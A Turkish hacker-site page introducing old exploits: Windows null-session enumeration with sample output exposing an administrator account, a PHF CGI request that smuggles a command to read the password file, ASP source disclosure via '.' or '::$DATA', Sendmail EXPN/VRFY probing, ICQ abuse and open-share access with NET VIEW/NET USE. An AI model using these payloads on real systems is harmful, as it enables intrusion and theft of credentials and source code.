Anasayfa Yap
   
  gameturkhacker
  Exploit'ler Giriş
 
Exploit'ler Giriş

Exploitler genelde sistem tabanlı olarak çalışırlar yani Unix'e ait bir exploit Windows için çalışmaz. Bu güne kadar bulunan yaklaşık olarak 1000’in üzerinde exploit vardır.
Windows Null Session Exploit : Windows işletim sistemi, dışarıdaki kullanıcılara network üzerinde hiç bir hakka sahip olmadan session, user ve share information'ı verir. Kötü niyetli birisi bu exploiti kullanarak sistem hakkında çok kritik bilgiler sahibi olabilir.
Örnek : 


Kod:
Agis NT Peek utility V0.5 , (C) Copyright by Agis Corp 1998. All rights reserved.   Connecting to : 194.***.**.**   connection established   Processing..   194.***.***.***NETLOGON                               (disk)  Logon server share   194.***.***.***i386                                        (disk)    194.***.***.***IE4.3000                                  (disk)    Getting Session information ..    Server name : TiN User  name : (None)    Login Time  : 154461 secs (2574 mins)  IIdle Time   : 559 secs (9 mins)   -----------------------    Server name : MiP  Usern  name : (None)    Login Time  : 573 secs (9 mins)  Idle Time   : 573 secs (9 mins)   -----------------------   [lord*****]    Password : **********    Account : (lord*****)    Full name : (Lord zerg ******)    Comment : (Administration account)    User Comment : (Dark throne)    Password age : (0) hours    Privledge : Administrator    Home Dir : ()    Script path : ()    Spec Params : ()    Workstations : ()    Logon Hours : (1349551)    # of badpass : (0)    Logon count : (2896)    Logon Server : (*)    Country Code : (0)    Code Page : (0)    User ID : (500)    Group ID : (512)    Profile : ()    Home drive : ()    Password Exp : (0)    Auth Flags :   -No auth flags    Flags :               - The logon script executed              - This account is normal              - password doesn't expire              - user can change password          




PHF Exploit : Bu exploit oldukça eski olmasına rağmen halen karşılaşabilecek bir güvenlik açığıdır, PHF CGI yardımı ile sistemdeki dosyalara admin olarak erişilebilinir. 


Kod:
GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd  http://www.phfcalistiranserver.com/cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd  



Yukarıdaki örnek Unix işletim sistemi ya da türevini kullanan bir makineden User bilgilerinin ve de şifrelerinin bulunduğu Password dosyasının görülmesini sağlar.
ASP Exploit : Active Server Page özelliği kullanan WebServer’larda URL' nin sonuna bir nokta(.) yada ::şDATA yazılarak ASP’nin içeriği (source code) görülebilir. Eğer ASP'nin içerisinde her hangi bir şifre varsa bu exploit çok tehlikeli olabilir. 


Kod:
http://www.aspkullananserver.com/default.asp.    ya da  http://www.aspkullananserver.com/default.asp::$DATA  




Sendmail Exploit : Eski Sendmail versiyonlarında birkaç basit hile ile sistemin şifrelerinin tutulduğu dosyayı çekmek mümkün olabilir. Ayrıca sistem kullanıcıları hakkında bilgi almak (EXPN) yada bir Username’in o Server’da olup olmadığını öğrenmek de mümkündür. (VRFY) 


Kod:
telnet mail.server.com:25  




ICQ Tabanlı Exploitler : Son derece zayıf bir mimariye sahip olan ICQ sistemi, kolayca taklit edilebilen, hatta gerçek spoofing bile yapılmasına gerek kalmayan bir sistemdir. ICQ kullanıcıları kolayca mesaj bombasına tutulabilir, passwordleri değiştirilebilir, onaya gerek kalmadan listeye alınabilir. IP'sini kullanıcı gösterme dese bile görülebilir yada ICQ chat yaparken mesaj taşması (flooding) yapılabilir.
Dosya ve yazıcı paylaşımı : 

Windows 95 yada NT’de paylaşıma açılan disk ya da klasörlerin okuma-yazma izinlerine çok dikkat edilmelidir. Şifresiz (Şu birçok ISP’nin Inetpub Directory'sini tüm dünyaya yazma izni vererek paylaşıma açması gibi) ya da kolay tahmin edilebilecek (username ile aynı) bir şifre ile paylaşıma açılan disk yada klasörlerin her türlü saldırıya açık olması gibi durumlar istenmeyen durumlara yol açabilir.
Windows Start menüsünde Run seçeneği tıklatıldıktan sonra IP yazıp Enter tuşuna basılırsa, IP'si yazılan makinede paylaşıma açık olan yerler görülebilir. Windows’un içinde var olan NET komutunu kullanarak (NET VIEW IP) yine paylaşıma açık yerleri görebilir ve yine aynı komutla onlara bağlanılabilir.
(NET USE J: IPpaylaşımismi) Ayrıca linux yüklü bir makineden, smbclient programı ile aynı işlemleri yapılabilir.
Bu tip tehlikelerden korunmak için paylaşımlara sağlam bir şifre zorunludur. (anlamsız kelime+ rakamlar+hem büyük hem küçük harf kullanıması vs.)
Diğer Araçlar : Snork, cachecow, ADMmountd, mountd, faxsurvey, vintra,hotmail_exploit1-2, ioconfig lpd-rm, dilloncrond, nameserver_dead, lpd-mail, imapd4, binfo-udp, pinebug, mailxploit, newxterm, mailex, metainfo, xterm_exploit, dip3.3.7overflow-exploit, coke ve daha bir çok exploit bulunuyor.
__________________

 Ondandır Bu Vazokonstraktif Atılımgaçlarım Nazal Seviyede Ondan İnhibitör Seviyem Yüksek... 

Bu İmzamı Çalan Kişilerin, Kendi Kendine Oluşturabilecekleri Bir İmza Yokmu?  
 
  Bugün 57 ziyaretçi (65 klik) kişi burdaydı!  
 
Bu web sitesi ücretsiz olarak Bedava-Sitem.com ile oluşturulmuştur. Siz de kendi web sitenizi kurmak ister misiniz?
Ücretsiz kaydol